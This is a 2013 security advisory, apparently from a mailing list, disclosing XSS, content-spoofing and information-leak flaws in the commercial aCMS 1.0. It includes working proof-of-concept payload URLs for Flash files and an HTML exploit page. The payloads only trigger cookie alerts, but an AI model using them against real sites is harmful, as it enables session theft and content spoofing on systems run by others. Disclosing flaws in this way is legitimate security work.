aCMS 1.0 XSS / Content Spoofing / Information Leak

`Hello list!  
  
These are Cross-Site Scripting, Content Spoofing and Information Leakage   
vulnerabilities in aCMS. This is commercial CMS. There are multiple   
vulnerabilities in aCMS and it's the first part of them.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are aCMS 1.0 and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Almacor  
http://almacor.ru  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
For ZeroClipboard10.swf XSS via id parameter and XSS via copying payload   
into clipboard are possible.  
  
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E  
  
Content Spoofing (WASC-12):  
  
Swf-file accepts arbitrary addresses in parameter flvToPlay and startImage,   
which allows to spoof content of flash - i.e. by setting addresses of video   
and/or image files from other site.  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml  
  
Swf-file accepts arbitrary addresses in parameter flvToPlay, which allows to   
spoof content of flash - i.e. by setting address of playlist file from other   
site (parameters thumbnail and url in xml-file accept arbitrary addresses).  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<playlist>  
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>  
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>  
</playlist>  
  
Cross-Site Scripting (WASC-08):  
  
If at the site at page with flv_player.swf (with parameter jsCallback=true,   
or if there is possibility to set this parameter for flv_player.swf) there   
is possibility to include JS code with function flvStart() and/or flvEnd()   
(via HTML Injection), then it's possible to conduct XSS attack. I.e.   
JS-callbacks can be used for XSS attack.  
  
Example of exploit:  
  
<html>  
<body>  
<script>  
function flvStart() {  
alert('XSS');  
}  
function flvEnd() {  
alert('XSS');  
}  
</script>  
<object width="50%" height="50%">  
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">  
<param name=quality value=high>  
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"   
height="50%" quality=high   
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"   
type="application/x-shockwave-flash"></embed>  
</object>  
</body>  
</html>  
  
Information Leakage (WASC-13):  
  
http://site/assets/1  
  
At error 404 page there are Source Code Disclosure, Full Path Disclosure and   
showing list of the files and other information.  
  
------------  
Timeline:  
------------   
  
2013.03.04 - informed developers about part of the vulnerabilities.  
2013.04.03 - informed developers about another part of the vulnerabilities.  
2013.04.05 - announced at my site.  
2013.04.07 - informed developers about another part of the vulnerabilities.  
2013.05.25 - informed developers about another part of the vulnerabilities.   
In all cases the developers just ignored all messages via different e-mails   
and contact form.  
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`